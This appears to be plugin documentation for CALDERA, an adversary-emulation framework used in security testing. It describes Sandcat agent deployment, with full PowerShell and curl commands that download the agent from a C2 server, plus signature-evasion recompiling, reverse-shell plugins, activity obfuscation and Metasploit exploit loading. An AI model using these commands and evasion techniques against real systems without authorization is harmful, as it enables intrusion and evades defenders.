Here you’ll get a run-down of all open-source plugins, all of which can be found in the plugins/ directory as separate GIT repositories.
To enable a plugin, add it to the
default.yml file in the
conf/ directory. Make sure your server is stopped when editing the
Plugins can also be enabled through the GUI. Go to Advanced -> Configuration and then click on the ‘enable’ button for the plugin you would like to enable.
The Sandcat plugin, otherwise known as 54ndc47, is the default agent that CALDERA ships with. 54ndc47 is written in GoLang for cross-platform compatibility.
54ndc47 agents require network connectivity to CALDERA at port 8888.
To deploy 54ndc47, use one of the built-in delivery commands which allows you to run the agent on any operating system. Each of these commands downloads the compiled 54ndc47 executable from CALDERA and runs it immediately. Find the commands on the Sandcat plugin tab.
Once the agent is running, it should show log messages when it beacons into CALDERA.
If you have GoLang installed on the CALDERA server, each time you run one of the delivery commands above, the agent will re-compile itself dynamically and it will change it’s source code so it gets a different file hash (MD5) and a random name that blends into the operating system. This will help bypass file-based signature detections.
When deploying a 54ndc47 agent, there are optional parameters you can use when you start the executable:
Server: This is the location of CALDERA. The agent must have connectivity to this host/port.
Group: This is the group name that you would like the agent to join when it starts. The group does not have to exist. A default group of my_group will be used if none is passed in.
-vto see verbose output from sandcat. Otherwise, sandcat will run silently.
In order to keep the agent code lightweight, the default 54ndc47 agent binary ships with limited basic functionality.
Users can dynamically compile additional features, referred to as “gocat extensions”. Each extension adds to the
gocat module code to provide functionality such as peer-to-peer proxy implementations, additional
executors, and additional C2 contact protocols.
To request particular gocat extensions, users can
gocat-extensions HTTP header when asking the C2 to compile an agent. The header value
must be a comma-separated list of requested extensions. The server will include the extensions in
the binary if they exist and if their dependencies are met (i.e. if extension A requires a particular
Golang module that is not installed on the server, then extension A will not be included).
Below is an example powershell snippet to request the C2 server to include the
$url="http://192.168.137.1:8888/file/download"; # change server IP/port as needed $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); # specifying Windows build $wc.Headers.add("file","sandcat.go"); # requesting sandcat binary $wc.Headers.add("gocat-extensions","proxy_http,shells"); # requesting the extensions $output="C:\Users\Public\sandcat.exe"; # specify destination filename $wc.DownloadFile($url,$output); # download
The following features are included in the stock agent:
HTTPC2 contact protocol
pshpowershell executor (Windows)
shshell executor (Linux/Mac)
Additional functionality can be found in the following gocat extensions:
gistextension provides the Github gist C2 contact protocol.
shellsextension provides the
osascript(Mac Osascript), and
pwsh(Windows powershell core) executors.
shellcodeextension provides the shellcode executors.
proxy_httpextension provides the
HTTPpeer-to-peer proxy receiver.
proxy_smb_pipeextension provides the
SmbPipepeer-to-peer proxy client and receiver for Windows (peer-to-peer communication via SMB named pipes).
donutextension provides the Donut functionality to execute various assemblies in memory. See https://github.com/TheWover/donut for additional information.
sharedextension provides the C sharing functionality for 54ndc47.
Customizing Default Options & Execution Without CLI Options¶
It’s possible to customize the default values of these options when pulling Sandcat from the CALDERA server.
This is useful if you want to hide the parameters from the process tree. You can do this by passing the values in as headers instead of as parameters.
For example, the following will download a linux executable that will use
http://10.0.0.2:8888 as the server address
curl -sk -X POST -H 'file:sandcat.go' -H 'platform:linux' -H 'server:http://10.0.0.2:8888' http://localhost:8888/file/download > sandcat.sh
The Mock plugin adds a set of simulated agents to CALDERA and allows you to run complete operations without hooking any other computers up to your server.
These agents are created inside the
conf/agents.yml file. They can be edited and you can create as many as you’d like. A sample agent looks like:
- paw: 1234 username: darthvader host: deathstar group: simulation platform: windows location: C:\Users\Public enabled: True privilege: User c2: HTTP exe_name: sandcat.exe executors: - pwsh - psh
After you load the mock plugin and restart CALDERA, all simulated agents will appear as normal agents in the Chain plugin GUI and can be used in any operation.
The terminal plugin adds reverse-shell capability to CALDERA, along with a TCP-based agent called Manx.
When this plugin is loaded, you’ll get access to a new GUI page which allows you to drop reverse-shells on target hosts and interact manually with the hosts.
You can use the terminal emulator on the Terminal GUI page to interact with your sessions.
The stockpile plugin adds a few components to CALDERA:
These components are all loaded through the
The response plugin is an autonomous incident response plugin, which can fight back against adversaries on a compromised host.
Similar to the stockpile plugin, it contains adversaries, abilties, and facts intended for incident response. These components are all loaded through the
Create visualizations to explore TTPs. Follow the steps below to create your own visualization:
Click ‘Generate Layer’
Click ‘+’ to open a new tab in the navigator
Select ‘Open Existing Layer’
Select ‘Upload from local’ and upload the generated layer file
Compass leverages ATT&CK Navigator, for more information see: https://github.com/mitre-attack/attack-navigator
The caltack plugin adds the public MITRE ATT&CK website to CALDERA. This is useful for deployments of CALDERA where an operator cannot access the Internet to reference the MITRE ATT&CK matrix.
After loading this plugin and restarting, the ATT&CK website is available from the CALDERA home page. Not all parts of the ATT&CK website will be available - but we aim to keep those pertaining to tactics and techniques accessible.
The SSL plugin adds HTTPS to CALDERA.
This plugin only works if CALDERA is running on a Linux or MacOS machine. It requires HaProxy (>= 1.8) to be installed prior to using it.
When this plugin has been loaded, CALDERA will start the HAProxy service on the machine and then serve CALDERA at hxxps://[YOUR_IP]:8443, instead of the normal hxxp://[YOUR_IP]:8888.
CALDERA will only be available at https://[YOUR_IP]:8443 when using this plugin. All deployed agents should use the correct address to connect to CALDERA.
The Atomic plugin imports all Red Canary Atomic tests from their open-source GitHub repository.
The GameBoard plugin allows you to monitor both red-and-blue team operations. The game tracks points for both sides and determines which one is “winning”.
To begin a gameboard exercise, first log in as blue user and deploy an agent. The ‘Auto-Collect’ operation will execute automatically. Alternatively, you can begin a different operation with the blue agent if you desire. Log in as red user and begin another operation. Open up the gameboard plugin from the GUI and select these new respective red and blue operations to monitor points for each operation.
The Human plugin allows you to build “Humans” that will perform user actions on a target system as a means to obfuscate red actions by Caldera. Each human is built for a specific operating system and leverages the Chrome browser along with other native OS applications to perform a variety of tasks. Additionally, these humans can have various aspects of their behavior “tuned” to add randomization to the behaviors on the target system.
On the CALDERA server, there are additional python packages required in order to use the Human plugin.
These python packages can be installed by navigating to the
plugins/human/ directory and running the command
pip3 install -r requirements.txt
With the python package installed and the plugin enabled in the configuration file, the Human plugin is ready for use. When opening the plugin within CALDERA, there are a few actions that the human can perform. Check the box for each action you would like the human to perform. Once the actions are selected, then “Generate” the human.
The generated human will show a deployment command for how to run it on a target machine. Before deploying the human on a target machine, there are 3 requirements:
Install python3 on the target machine
Install the python package
virtualenvon the target machine
Install Google Chrome on the target machine
Once the requirements above are met, then copy the human deployment command from the CALDERA server and run it on the target machine. The deployment command downloads a tar file from the CALDERA server, un-archives it, and starts the human using python. The human runs in a python virtual environment to ensure there are no package conflicts with pre-existing packages.
This plugin allows a user to gain a “User Certificate” which proves their ability to use CALDERA. This is the first of several certificates planned in the future. The plugin takes you through a capture-the-flag style certification course, covering all parts CALDERA.
This plugin allows you to task any agent with any ability from the database. It also allows you to conduct initial access attacks.
The Access plugin also allows for the easy creation of abilities for Metasploit exploits.
An agent running on a host that has Metasploit installed
app.contact.httpoption in CALDERA’s configuration includes
A fact source that includes a
app.api_key.redfact with a value equal to the
api_key_redoption in CALDERA’s configuration
build-capabilities tactic there is an ability called
Load Metasploit Abilities. Run this ability with an agent and fact source as described above, which will add a new ability for each Metasploit exploit. These abilities can then be found under the
metasploit tactic. Note that this process may take 15 minutes.
If the exploit has options, you’ll need to set them by adding a fact for it with the
msf. prefix. For example, to set
RHOST, add a fact called
The Builder plugin enables CALDERA to dynamically compile code segments into payloads that can be executed as abilities by implants.
Currently, only C# is supported. Code is compiled in a Docker container using Mono. The resulting executable, along with any additional references, will be copied to the remote machine and executed.